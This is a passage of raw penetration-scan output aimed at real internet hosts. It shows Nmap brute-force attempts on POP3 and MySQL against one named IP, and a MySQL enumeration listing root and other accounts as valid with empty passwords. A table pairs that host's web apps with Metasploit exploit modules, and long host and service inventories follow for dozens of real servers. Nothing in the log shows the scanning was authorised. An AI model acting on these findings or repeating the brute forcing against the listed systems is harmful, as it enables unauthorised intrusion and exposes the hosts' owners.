451414 363.17 ms be2718.ccr42.ord01.atlas.cogentco.com (154.54.7.129)
451515 485.03 ms be2832.ccr22.mci01.atlas.cogentco.com (154.54.44.169)
451616 485.01 ms be2432.ccr31.dfw01.atlas.cogentco.com (154.54.3.133)
451717 485.05 ms be2560.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.5.238)
451818 485.03 ms 38.32.13.210
451919 363.13 ms ip-143-95-110-248.iplocal (143.95.110.248)
4520#####################################################################################################################################
4521Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 07:07 EST
4522NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
4523NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
4524NSE: [pop3-brute] passwords: Time limit 3m00s exceeded.
4525Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4526Host is up (0.28s latency).
4527
4528PORT STATE SERVICE VERSION
4529110/tcp open pop3 Dovecot pop3d
4530| pop3-brute:
4531| Accounts: No valid accounts found
4532|_ Statistics: Performed 185 guesses in 186 seconds, average tps: 0.8
4533|_pop3-capabilities: STLS CAPA TOP PIPELINING AUTH-RESP-CODE UIDL RESP-CODES SASL(PLAIN LOGIN) USER
4534Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4535Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), Linux 2.6.18 - 2.6.22 (90%), Grandstream GXV3275 video phone (90%), Linux 3.2 - 3.8 (90%), Linux 3.3 (90%), MikroTik RouterOS 6.15 (Linux 3.3.5) (90%), MikroTik RouterOS 6.32.1 (89%), Linux 2.6.32 - 2.6.39 (89%), Linux 2.6.32 (88%), HP P2000 G3 NAS device (88%)
4536No exact OS matches for host (test conditions non-ideal).
4537Network Distance: 19 hops
4538
4539TRACEROUTE (using port 110/tcp)
4540HOP RTT ADDRESS
45411 305.51 ms 10.202.8.1
45422 305.54 ms 185.32.222.3
45433 305.55 ms core02-40gb.datasource.ch (91.201.58.73)
45444 305.57 ms zch-b2-link.telia.net (62.115.180.122)
45455 305.60 ms ffm-bb1-link.telia.net (62.115.142.110)
45466 305.59 ms ffm-b5-link.telia.net (62.115.114.91)
45477 305.61 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
45488 305.65 ms be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1)
45499 243.93 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
455010 332.21 ms be2183.ccr22.lpl01.atlas.cogentco.com (154.54.58.69)
455111 332.26 ms be3043.ccr22.ymq01.atlas.cogentco.com (154.54.44.166)
455212 271.88 ms be3260.ccr32.yyz02.atlas.cogentco.com (154.54.42.89)
455313 332.25 ms be2994.ccr22.cle04.atlas.cogentco.com (154.54.31.233)
455414 332.27 ms be2717.ccr41.ord01.atlas.cogentco.com (154.54.6.221)
455515 332.33 ms be2832.ccr22.mci01.atlas.cogentco.com (154.54.44.169)
455616 332.32 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)
455717 332.34 ms be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74)
455818 332.34 ms 38.32.13.210
455919 332.33 ms ip-143-95-110-248.iplocal (143.95.110.248)
4560######################################################################################################################################
4561Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 07:10 EST
4562NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
4563NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
4564NSE: [mysql-brute] passwords: Time limit 3m00s exceeded.
4565Stats: 0:09:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
4566NSE Timing: About 98.88% done; ETC: 07:20 (0:00:07 remaining)
4567Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4568Host is up (0.32s latency).
4569
4570PORT STATE SERVICE VERSION
45713306/tcp open mysql MySQL 5.6.41-84.1
4572| mysql-brute:
4573| Accounts: No valid accounts found
4574|_ Statistics: Performed 3096 guesses in 180 seconds, average tps: 16.6
4575| mysql-enum:
4576| Valid usernames:
4577| root:<empty> - Valid credentials
4578| web:<empty> - Valid credentials
4579| netadmin:<empty> - Valid credentials
4580| guest:<empty> - Valid credentials
4581| user:<empty> - Valid credentials
4582| sysadmin:<empty> - Valid credentials
4583| admin:<empty> - Valid credentials
4584| webadmin:<empty> - Valid credentials
4585| administrator:<empty> - Valid credentials
4586| test:<empty> - Valid credentials
4587|_ Statistics: Performed 10 guesses in 3 seconds, average tps: 3.3
4588| mysql-info:
4589| Protocol: 10
4590| Version: 5.6.41-84.1
4591| Thread ID: 55597197
4592| Capabilities flags: 63487
4593| Some Capabilities: InteractiveClient, Support41Auth, Speaks41ProtocolOld, LongPassword, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, FoundRows, SupportsCompression, DontAllowDatabaseTableColumn, ConnectWithDatabase, IgnoreSigpipes, SupportsTransactions, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
4594| Status: Autocommit
4595| Salt: wm?/mYU|3'j_}yfu9Y7C
4596|_ Auth Plugin Name: mysql_native_password
4597Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4598Aggressive OS guesses: Grandstream GXV3275 video phone (91%), Linux 3.2 - 3.8 (91%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), Linux 2.6.18 - 2.6.22 (90%), Linux 3.3 (90%), MikroTik RouterOS 6.32.1 (90%), MikroTik RouterOS 6.15 (Linux 3.3.5) (90%), Linux 3.10 (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 2.6.39 (89%)
4599No exact OS matches for host (test conditions non-ideal).
4600Network Distance: 19 hops
4601
4602TRACEROUTE (using port 3306/tcp)
4603HOP RTT ADDRESS
46041 247.26 ms 10.202.8.1
46052 367.75 ms 185.32.222.3
46063 243.50 ms core02-40gb.datasource.ch (91.201.58.73)
46074 243.53 ms zch-b2-link.telia.net (62.115.180.122)
46085 243.57 ms ffm-bb1-link.telia.net (62.115.142.110)
46096 243.63 ms ffm-b5-link.telia.net (62.115.114.89)
46107 243.63 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
46118 243.67 ms be3187.ccr42.fra03.atlas.cogentco.com (130.117.1.118)
46129 365.20 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121)
461310 384.06 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
461411 384.16 ms be3042.ccr21.ymq01.atlas.cogentco.com (154.54.44.162)
461512 384.11 ms be3599.ccr21.alb02.atlas.cogentco.com (66.28.4.237)
461613 384.16 ms be2993.ccr21.cle04.atlas.cogentco.com (154.54.31.225)
461714 384.15 ms be2718.ccr42.ord01.atlas.cogentco.com (154.54.7.129)
461815 505.94 ms be2832.ccr22.mci01.atlas.cogentco.com (154.54.44.169)
461916 384.25 ms be2432.ccr31.dfw01.atlas.cogentco.com (154.54.3.133)
462017 505.99 ms be2560.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.5.238)
462118 506.02 ms 38.32.13.210
462219 263.13 ms ip-143-95-110-248.iplocal (143.95.110.248)
4623#####################################################################################################################################
4624+----------------------+---------------------------------------+------------------------------------------------+----------+----------+
4625| App Name | URL to Application | Potential Exploit | Username | Password |
4626+----------------------+---------------------------------------+------------------------------------------------+----------+----------+
4627| Linksys WRT54GL | https://143.95.110.248:8443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
4628| JBoss Status Servlet | https://143.95.110.248:443/status | ./auxiliary/scanner/http/jboss_status.rb | None | None |
4629+----------------------+---------------------------------------+------------------------------------------------+----------+----------+
4630#####################################################################################################################################
4631Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 07:43 EST
4632Warning: 143.95.110.248 giving up on port because retransmission cap hit (2).
4633Nmap scan report for ip-143-95-110-248.iplocal (143.95.110.248)
4634Host is up (0.25s latency).
4635
4636PORT STATE SERVICE VERSION
463753/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
463867/tcp closed dhcps
463968/tcp closed dhcpc
464069/tcp closed tftp
464188/tcp closed kerberos-sec
4642123/tcp closed ntp
4643137/tcp closed netbios-ns
4644138/tcp closed netbios-dgm
4645139/tcp closed netbios-ssn
4646161/tcp closed snmp
4647162/tcp closed snmptrap
4648389/tcp closed ldap
4649520/tcp closed efs
46502049/tcp closed nfs
465153/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
4652| dns-nsid:
4653|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6
465467/udp closed dhcps
465568/udp closed dhcpc
465669/udp closed tftp
465788/udp open|filtered kerberos-sec
4658123/udp open|filtered ntp
4659137/udp closed netbios-ns
4660138/udp closed netbios-dgm
4661139/udp closed netbios-ssn
4662161/udp closed snmp
4663162/udp open|filtered snmptrap
4664389/udp closed ldap
4665520/udp closed route
46662049/udp open|filtered nfs
4667Aggressive OS guesses: Grandstream GXV3275 video phone (92%), Linux 3.2 - 3.8 (92%), Linux 3.3 (91%), Linux 2.6.32 - 2.6.39 (90%), Linux 3.10 (89%), Linux 2.6.32 (89%), Check Point UTM-1 Edge X firewall (89%), Linux 2.6.39 (88%), Linux 3.4 (88%), Linux 3.8 (88%)
4668No exact OS matches for host (test conditions non-ideal).
4669Network Distance: 19 hops
4670Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
4671
4672TRACEROUTE (using port 67/tcp)
4673HOP RTT ADDRESS
46741 409.07 ms 10.202.8.1
46752 409.15 ms 185.32.222.3
46763 365.17 ms core02-40gb.datasource.ch (91.201.58.73)
46774 365.22 ms zch-b2-link.telia.net (62.115.180.122)
46785 365.28 ms ffm-bb1-link.telia.net (62.115.142.110)
46796 365.26 ms ffm-b5-link.telia.net (62.115.114.91)
46807 365.30 ms be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197)
46818 242.71 ms be3187.ccr42.fra03.atlas.cogentco.com (130.117.1.118)
46829 252.53 ms be2814.ccr42.ams03.atlas.cogentco.com (130.117.0.141)
468310 386.06 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
468411 386.03 ms be2099.ccr31.bos01.atlas.cogentco.com (154.54.82.34)
468512 386.09 ms be3599.ccr21.alb02.atlas.cogentco.com (66.28.4.237)
468613 386.11 ms be2994.ccr22.cle04.atlas.cogentco.com (154.54.31.233)
468714 386.13 ms be2718.ccr42.ord01.atlas.cogentco.com (154.54.7.129)
468815 515.92 ms be2832.ccr22.mci01.atlas.cogentco.com (154.54.44.169)
468916 386.16 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)
469017 515.90 ms be2560.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.5.238)
469118 515.97 ms 38.32.13.210
469219 254.96 ms ip-143-95-110-248.iplocal (143.95.110.248)
4693######################################################################################################################################
4694Hosts
4695=====
4696
4697address mac name os_name os_flavor os_sp purpose info comments
4698------- --- ---- ------- --------- ----- ------- ---- --------
469934.236.0.217 ec2-34-236-0-217.compute-1.amazonaws.com Linux 3.X server
470037.1.207.121 teens-sins.net 2-Series 3.X device
470143.245.223.4 Linux 2.6.X server
470245.60.47.218 Linux 3.X server
470345.88.202.111 Linux 3.X server
470452.1.174.10 ec2-52-1-174-10.compute-1.amazonaws.com Linux 3.X server
470554.85.59.109 ec2-54-85-59-109.compute-1.amazonaws.com Linux 3.X server
470664.69.94.253 Unknown device
470769.163.233.4 ps54052.dreamhostps.com Linux 14.04 server
470874.117.180.192 embedded device
470982.94.222.131 Unknown device
471092.123.250.35 a92-123-250-35.deploy.static.akamaitechnologies.com embedded device
471192.123.250.65 a92-123-250-65.deploy.static.akamaitechnologies.com Linux 3.X server
4712104.244.73.40 Unknown device
4713104.244.76.231 Linux 3.X server
4714104.244.77.188 Linux 3.X server
4715104.244.79.89 Linux 3.X server
4716111.90.145.39 web16.support-emilid.com Linux 2.6.X server
4717143.95.110.248 ip-143-95-110-248.iplocal Linux 3.X server
4718149.126.72.220 149.126.72.220.ip.incapdns.net Linux 3.X server
4719151.106.38.107 ns3152160.ip-151-106-38.eu embedded device
4720158.69.13.254 ip254.ip-158-69-13.net 2-Series 2.6.X device
4721162.244.35.13 xnlog.com FreeBSD 7.X device
4722169.239.218.20 cp10.domains.co.za Linux 2.6.X server
4723173.214.244.169 173.214.244.169.serverel.net Unknown device
4724174.142.53.51 mail.marineland.ca Linux 3.X server
4725190.98.209.37 static.190.98.209.37.gtdinternet.com Unknown device
4726190.153.209.187 static.190.153.209.187.gtdinternet.com Unknown device
4727190.153.219.254 mail.evopoli.cl Linux 3.X server
4728200.2.249.28 Linux 3.X server
4729200.29.0.33 cp33.puntoweb.cl Unknown device
4730200.55.198.228 Linux 2.4.X server
4731200.68.34.99 Unknown device
4732200.73.54.34 mail.maxtel.cl Linux 2.6.X server
4733204.93.193.141 suzuka.mochahost.com Unknown device
4734206.48.140.40 Unknown device
4735207.246.147.189 2-Series device
4736207.246.147.190 Linux 4.X server
4737207.246.147.247 Linux 4.X server
4738207.246.147.248 Linux 4.X server
4739211.13.196.135 sv3.isle.ne.jp Linux 2.6.X server
4740218.45.5.97 www.town.koya.wakayama.jp Linux 2.6.X server
4741#####################################################################################################################################
4742Services
4743========
4744
4745host port proto name state info
4746---- ---- ----- ---- ----- ----
474734.236.0.217 53 tcp domain filtered
474834.236.0.217 53 udp domain unknown
474934.236.0.217 67 tcp dhcps filtered
475034.236.0.217 67 udp dhcps unknown
475134.236.0.217 68 tcp dhcpc filtered
475234.236.0.217 68 udp dhcpc unknown
475334.236.0.217 69 tcp tftp filtered
475434.236.0.217 69 udp tftp unknown
475534.236.0.217 80 tcp http open nginx
475634.236.0.217 88 tcp kerberos-sec filtered
475734.236.0.217 88 udp kerberos-sec unknown
475834.236.0.217 123 tcp ntp filtered
475934.236.0.217 123 udp ntp unknown
476034.236.0.217 137 tcp netbios-ns filtered
476134.236.0.217 137 udp netbios-ns unknown
476234.236.0.217 138 tcp netbios-dgm filtered
476334.236.0.217 138 udp netbios-dgm unknown
476434.236.0.217 139 tcp netbios-ssn filtered
476534.236.0.217 139 udp netbios-ssn unknown
476634.236.0.217 161 tcp snmp filtered
476734.236.0.217 161 udp snmp unknown
476834.236.0.217 162 tcp snmptrap filtered
476934.236.0.217 162 udp snmptrap unknown
477034.236.0.217 389 tcp ldap filtered
477134.236.0.217 389 udp ldap unknown
477234.236.0.217 443 tcp ssl/http open nginx
477334.236.0.217 520 tcp efs filtered
477434.236.0.217 520 udp route unknown
477534.236.0.217 2049 tcp nfs filtered
477634.236.0.217 2049 udp nfs unknown
477737.1.207.121 53 tcp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
477837.1.207.121 53 udp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
477937.1.207.121 67 tcp dhcps filtered
478037.1.207.121 67 udp dhcps unknown
478137.1.207.121 68 tcp dhcpc filtered
478237.1.207.121 68 udp dhcpc filtered
478337.1.207.121 69 tcp tftp filtered
478437.1.207.121 69 udp tftp unknown
478537.1.207.121 88 tcp kerberos-sec filtered
478637.1.207.121 88 udp kerberos-sec filtered
478737.1.207.121 123 tcp ntp filtered
478837.1.207.121 123 udp ntp unknown
478937.1.207.121 137 tcp netbios-ns filtered
479037.1.207.121 137 udp netbios-ns unknown
479137.1.207.121 138 tcp netbios-dgm filtered
479237.1.207.121 138 udp netbios-dgm unknown
479337.1.207.121 139 tcp netbios-ssn filtered
479437.1.207.121 139 udp netbios-ssn unknown
479537.1.207.121 161 tcp snmp filtered
479637.1.207.121 161 udp snmp unknown
479737.1.207.121 162 tcp snmptrap filtered
479837.1.207.121 162 udp snmptrap unknown
479937.1.207.121 389 tcp ldap filtered
480037.1.207.121 389 udp ldap unknown
480137.1.207.121 520 tcp efs filtered
480237.1.207.121 520 udp route unknown
480337.1.207.121 2049 tcp nfs filtered
480437.1.207.121 2049 udp nfs filtered
480543.245.223.4 80 tcp http open nginx
480643.245.223.4 443 tcp ssl/http open nginx
480743.245.223.4 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
480845.60.47.218 25 tcp http open Incapsula CDN httpd
480945.60.47.218 53 tcp domain open
481045.60.47.218 53 udp domain open
481145.60.47.218 67 udp dhcps unknown
481245.60.47.218 68 udp dhcpc unknown
481345.60.47.218 69 udp tftp unknown
481445.60.47.218 80 tcp http open Incapsula CDN httpd
481545.60.47.218 81 tcp http open Incapsula CDN httpd
481645.60.47.218 85 tcp http open Incapsula CDN httpd
481745.60.47.218 88 tcp http open Incapsula CDN httpd
481845.60.47.218 88 udp kerberos-sec unknown
481945.60.47.218 123 udp ntp unknown
482045.60.47.218 137 udp netbios-ns unknown
482145.60.47.218 138 udp netbios-dgm unknown
482245.60.47.218 139 udp netbios-ssn unknown
482345.60.47.218 161 udp snmp unknown
482445.60.47.218 162 udp snmptrap unknown
482545.60.47.218 389 tcp ssl/http open Incapsula CDN httpd
482645.60.47.218 389 udp ldap unknown
482745.60.47.218 443 tcp ssl/http open Incapsula CDN httpd
482845.60.47.218 444 tcp ssl/http open Incapsula CDN httpd
482945.60.47.218 445 tcp ssl/http open Incapsula CDN httpd
483045.60.47.218 446 tcp http open Incapsula CDN httpd
483145.60.47.218 520 udp route unknown
483245.60.47.218 587 tcp http open Incapsula CDN httpd
483345.60.47.218 631 tcp http open Incapsula CDN httpd
483445.60.47.218 888 tcp http open Incapsula CDN httpd
483545.60.47.218 995 tcp ssl/http open Incapsula CDN httpd
483645.60.47.218 998 tcp ssl/http open Incapsula CDN httpd
483745.60.47.218 999 tcp http open Incapsula CDN httpd
483845.60.47.218 1000 tcp http open Incapsula CDN httpd
483945.60.47.218 1024 tcp http open Incapsula CDN httpd
484045.60.47.218 1103 tcp http open Incapsula CDN httpd
484145.60.47.218 1234 tcp http open Incapsula CDN httpd
484245.60.47.218 1433 tcp http open Incapsula CDN httpd
484345.60.47.218 1494 tcp http open Incapsula CDN httpd
484445.60.47.218 2000 tcp ssl/http open Incapsula CDN httpd
484545.60.47.218 2001 tcp http open Incapsula CDN httpd
484645.60.47.218 2049 tcp http open Incapsula CDN httpd
484745.60.47.218 2049 udp nfs unknown
484845.60.47.218 2067 tcp http open Incapsula CDN httpd
484945.60.47.218 2100 tcp ssl/http open Incapsula CDN httpd
485045.60.47.218 2222 tcp http open Incapsula CDN httpd
485145.60.47.218 2598 tcp http open Incapsula CDN httpd
485245.60.47.218 3000 tcp http open Incapsula CDN httpd
485345.60.47.218 3050 tcp http open Incapsula CDN httpd
485445.60.47.218 3057 tcp http open Incapsula CDN httpd
485545.60.47.218 3299 tcp http open Incapsula CDN httpd
485645.60.47.218 3306 tcp ssl/http open Incapsula CDN httpd
485745.60.47.218 3333 tcp http open Incapsula CDN httpd
485845.60.47.218 3389 tcp ssl/http open Incapsula CDN httpd
485945.60.47.218 3500 tcp http open Incapsula CDN httpd
486045.60.47.218 3790 tcp http open Incapsula CDN httpd
486145.60.47.218 4000 tcp http open Incapsula CDN httpd
486245.60.47.218 4444 tcp ssl/http open Incapsula CDN httpd
486345.60.47.218 4445 tcp ssl/http open Incapsula CDN httpd
486445.60.47.218 4848 tcp http open Incapsula CDN httpd
486545.60.47.218 5000 tcp http open Incapsula CDN httpd
486645.60.47.218 5009 tcp http open Incapsula CDN httpd
486745.60.47.218 5051 tcp ssl/http open Incapsula CDN httpd
486845.60.47.218 5060 tcp ssl/http open Incapsula CDN httpd
486945.60.47.218 5061 tcp ssl/http open Incapsula CDN httpd
487045.60.47.218 5227 tcp ssl/http open Incapsula CDN httpd
487145.60.47.218 5247 tcp ssl/http open Incapsula CDN httpd
487245.60.47.218 5250 tcp ssl/http open Incapsula CDN httpd
487345.60.47.218 5555 tcp http open Incapsula CDN httpd
487445.60.47.218 5900 tcp http open Incapsula CDN httpd
487545.60.47.218 5901 tcp ssl/http open Incapsula CDN httpd
487645.60.47.218 5902 tcp ssl/http open Incapsula CDN httpd
487745.60.47.218 5903 tcp ssl/http open Incapsula CDN httpd
487845.60.47.218 5904 tcp ssl/http open Incapsula CDN httpd
487945.60.47.218 5905 tcp ssl/http open Incapsula CDN httpd
488045.60.47.218 5906 tcp ssl/http open Incapsula CDN httpd
488145.60.47.218 5907 tcp ssl/http open Incapsula CDN httpd
488245.60.47.218 5908 tcp ssl/http open Incapsula CDN httpd
488345.60.47.218 5909 tcp ssl/http open Incapsula CDN httpd
488445.60.47.218 5910 tcp ssl/http open Incapsula CDN httpd
488545.60.47.218 5920 tcp ssl/http open Incapsula CDN httpd
488645.60.47.218 5984 tcp ssl/http open Incapsula CDN httpd
488745.60.47.218 5985 tcp http open Incapsula CDN httpd
488845.60.47.218 5986 tcp ssl/http open Incapsula CDN httpd
488945.60.47.218 5999 tcp ssl/http open Incapsula CDN httpd
489045.60.47.218 6000 tcp http open Incapsula CDN httpd
489145.60.47.218 6060 tcp http open Incapsula CDN httpd
489245.60.47.218 6161 tcp http open Incapsula CDN httpd
489345.60.47.218 6379 tcp http open Incapsula CDN httpd
489445.60.47.218 6661 tcp ssl/http open Incapsula CDN httpd
489545.60.47.218 6789 tcp http open Incapsula CDN httpd
489645.60.47.218 7000 tcp ssl/http open Incapsula CDN httpd
489745.60.47.218 7001 tcp http open Incapsula CDN httpd
489845.60.47.218 7021 tcp http open Incapsula CDN httpd
489945.60.47.218 7071 tcp ssl/http open Incapsula CDN httpd
490045.60.47.218 7080 tcp http open Incapsula CDN httpd
490145.60.47.218 7272 tcp ssl/http open Incapsula CDN httpd
490245.60.47.218 7443 tcp ssl/http open Incapsula CDN httpd
490345.60.47.218 7700 tcp http open Incapsula CDN httpd
490445.60.47.218 7777 tcp http open Incapsula CDN httpd
490545.60.47.218 7778 tcp http open Incapsula CDN httpd
490645.60.47.218 8000 tcp http open Incapsula CDN httpd
490745.60.47.218 8001 tcp http open Incapsula CDN httpd
490845.60.47.218 8008 tcp http open Incapsula CDN httpd
490945.60.47.218 8014 tcp http open Incapsula CDN httpd
491045.60.47.218 8020 tcp http open Incapsula CDN httpd
491145.60.47.218 8023 tcp http open Incapsula CDN httpd
491245.60.47.218 8028 tcp http open Incapsula CDN httpd
491345.60.47.218 8030 tcp http open Incapsula CDN httpd
491445.60.47.218 8050 tcp http open Incapsula CDN httpd
491545.60.47.218 8051 tcp http open Incapsula CDN httpd
491645.60.47.218 8080 tcp http open Incapsula CDN httpd
491745.60.47.218 8081 tcp http open Incapsula CDN httpd
491845.60.47.218 8082 tcp http open Incapsula CDN httpd
491945.60.47.218 8085 tcp http open Incapsula CDN httpd
492045.60.47.218 8086 tcp http open Incapsula CDN httpd
492145.60.47.218 8087 tcp http open Incapsula CDN httpd
492245.60.47.218 8088 tcp http open Incapsula CDN httpd
492345.60.47.218 8090 tcp http open Incapsula CDN httpd
492445.60.47.218 8091 tcp http open Incapsula CDN httpd
492545.60.47.218 8095 tcp http open Incapsula CDN httpd
492645.60.47.218 8101 tcp http open Incapsula CDN httpd
492745.60.47.218 8161 tcp http open Incapsula CDN httpd
492845.60.47.218 8180 tcp http open Incapsula CDN httpd
492945.60.47.218 8222 tcp http open Incapsula CDN httpd
493045.60.47.218 8333 tcp http open Incapsula CDN httpd
493145.60.47.218 8443 tcp ssl/http open Incapsula CDN httpd
493245.60.47.218 8444 tcp http open Incapsula CDN httpd
493345.60.47.218 8445 tcp http open Incapsula CDN httpd
493445.60.47.218 8503 tcp ssl/http open Incapsula CDN httpd
493545.60.47.218 8686 tcp http open Incapsula CDN httpd
493645.60.47.218 8701 tcp ssl/http open Incapsula CDN httpd
493745.60.47.218 8787 tcp http open Incapsula CDN httpd
493845.60.47.218 8800 tcp http open Incapsula CDN httpd
493945.60.47.218 8812 tcp http open Incapsula CDN httpd
494045.60.47.218 8834 tcp http open Incapsula CDN httpd
494145.60.47.218 8880 tcp http open Incapsula CDN httpd
494245.60.47.218 8888 tcp http open Incapsula CDN httpd
494345.60.47.218 8889 tcp http open Incapsula CDN httpd
494445.60.47.218 8890 tcp http open Incapsula CDN httpd
494545.60.47.218 8899 tcp http open Incapsula CDN httpd
494645.60.47.218 8901 tcp http open Incapsula CDN httpd
494745.60.47.218 8902 tcp http open Incapsula CDN httpd
494845.60.47.218 8999 tcp http open Incapsula CDN httpd
494945.60.47.218 9000 tcp http open Incapsula CDN httpd
495045.60.47.218 9001 tcp http open Incapsula CDN httpd
495145.60.47.218 9002 tcp http open Incapsula CDN httpd
495245.60.47.218 9003 tcp http open Incapsula CDN httpd
495345.60.47.218 9004 tcp http open Incapsula CDN httpd
495445.60.47.218 9005 tcp http open Incapsula CDN httpd
495545.60.47.218 9010 tcp http open Incapsula CDN httpd
495645.60.47.218 9050 tcp http open Incapsula CDN httpd
495745.60.47.218 9080 tcp http open Incapsula CDN httpd
495845.60.47.218 9081 tcp ssl/http open Incapsula CDN httpd
495945.60.47.218 9084 tcp http open Incapsula CDN httpd
496045.60.47.218 9090 tcp http open Incapsula CDN httpd
496145.60.47.218 9099 tcp http open Incapsula CDN httpd
496245.60.47.218 9100 tcp jetdirect open
496345.60.47.218 9111 tcp http open Incapsula CDN httpd
496445.60.47.218 9200 tcp http open Incapsula CDN httpd
496545.60.47.218 9300 tcp http open Incapsula CDN httpd
496645.60.47.218 9500 tcp http open Incapsula CDN httpd
496745.60.47.218 9711 tcp ssl/http open Incapsula CDN httpd
496845.60.47.218 9991 tcp http open Incapsula CDN httpd
496945.60.47.218 9999 tcp http open Incapsula CDN httpd
497045.60.47.218 10000 tcp http open Incapsula CDN httpd
497145.60.47.218 10001 tcp http open Incapsula CDN httpd
497245.60.47.218 10008 tcp http open Incapsula CDN httpd
497345.60.47.218 10443 tcp ssl/http open Incapsula CDN httpd
497445.60.47.218 11001 tcp ssl/http open Incapsula CDN httpd
497545.60.47.218 12174 tcp http open Incapsula CDN httpd
497645.60.47.218 12203 tcp http open Incapsula CDN httpd
497745.60.47.218 12221 tcp http open Incapsula CDN httpd
497845.60.47.218 12345 tcp http open Incapsula CDN httpd
497945.60.47.218 12397 tcp http open Incapsula CDN httpd
498045.60.47.218 12401 tcp http open Incapsula CDN httpd
498145.60.47.218 14330 tcp http open Incapsula CDN httpd
498245.60.47.218 16000 tcp http open Incapsula CDN httpd
498345.60.47.218 20000 tcp http open Incapsula CDN httpd
498445.60.47.218 20010 tcp ssl/http open Incapsula CDN httpd
498545.60.47.218 25000 tcp ssl/http open Incapsula CDN httpd
498645.60.47.218 30000 tcp http open Incapsula CDN httpd
498745.60.47.218 44334 tcp ssl/http open Incapsula CDN httpd
498845.60.47.218 50000 tcp http open Incapsula CDN httpd
498945.60.47.218 50001 tcp ssl/http open Incapsula CDN httpd
499045.60.47.218 50050 tcp ssl/http open Incapsula CDN httpd
499145.88.202.111 22 tcp ssh open OpenSSH 7.9p1 Debian 10+deb10u1 protocol 2.0
499245.88.202.111 53 tcp domain open PowerDNS Authoritative Server 4.2.0-rc3
499345.88.202.111 53 udp domain open PowerDNS Authoritative Server 4.2.0-rc3
499445.88.202.111 67 tcp dhcps closed
499545.88.202.111 67 udp dhcps unknown
499645.88.202.111 68 tcp dhcpc closed
499745.88.202.111 68 udp dhcpc unknown
499845.88.202.111 69 tcp tftp closed
499945.88.202.111 69 udp tftp closed
500045.88.202.111 80 tcp http open nginx
500145.88.202.111 88 tcp kerberos-sec closed
500245.88.202.111 88 udp kerberos-sec unknown
500345.88.202.111 123 tcp ntp closed
500445.88.202.111 123 udp ntp closed
500545.88.202.111 137 tcp netbios-ns closed
500645.88.202.111 137 udp netbios-ns filtered
500745.88.202.111 138 tcp netbios-dgm closed
500845.88.202.111 138 udp netbios-dgm filtered
500945.88.202.111 139 tcp netbios-ssn closed
501045.88.202.111 139 udp netbios-ssn closed
501145.88.202.111 161 tcp snmp closed
501245.88.202.111 161 udp snmp closed
501345.88.202.111 162 tcp snmptrap closed
501445.88.202.111 162 udp snmptrap closed
501545.88.202.111 179 tcp bgp filtered
501645.88.202.111 389 tcp ldap closed
501745.88.202.111 389 udp ldap unknown
501845.88.202.111 443 tcp ssl/http open nginx
501945.88.202.111 520 tcp efs closed
502045.88.202.111 520 udp route unknown
502145.88.202.111 2049 tcp nfs closed
502245.88.202.111 2049 udp nfs closed
502345.88.202.111 10050 tcp tcpwrapped open
502452.1.174.10 53 tcp domain filtered
502552.1.174.10 53 udp domain unknown
502652.1.174.10 67 tcp dhcps filtered
502752.1.174.10 67 udp dhcps unknown
502852.1.174.10 68 tcp dhcpc filtered
502952.1.174.10 68 udp dhcpc unknown
503052.1.174.10 69 tcp tftp filtered
503152.1.174.10 69 udp tftp unknown
503252.1.174.10 80 tcp http open nginx
503352.1.174.10 88 tcp kerberos-sec filtered
503452.1.174.10 88 udp kerberos-sec unknown
503552.1.174.10 123 tcp ntp filtered
503652.1.174.10 123 udp ntp unknown
503752.1.174.10 137 tcp netbios-ns filtered
503852.1.174.10 137 udp netbios-ns unknown
503952.1.174.10 138 tcp netbios-dgm filtered
504052.1.174.10 138 udp netbios-dgm unknown
504152.1.174.10 139 tcp netbios-ssn filtered
504252.1.174.10 139 udp netbios-ssn unknown
504352.1.174.10 161 tcp snmp filtered
504452.1.174.10 161 udp snmp unknown
504552.1.174.10 162 tcp snmptrap filtered
504652.1.174.10 162 udp snmptrap unknown
504752.1.174.10 389 tcp ldap filtered
504852.1.174.10 389 udp ldap unknown
504952.1.174.10 443 tcp ssl/http open nginx
505052.1.174.10 520 tcp efs filtered
505152.1.174.10 520 udp route unknown
505252.1.174.10 2049 tcp nfs filtered
505352.1.174.10 2049 udp nfs unknown
505454.85.59.109 53 tcp domain filtered
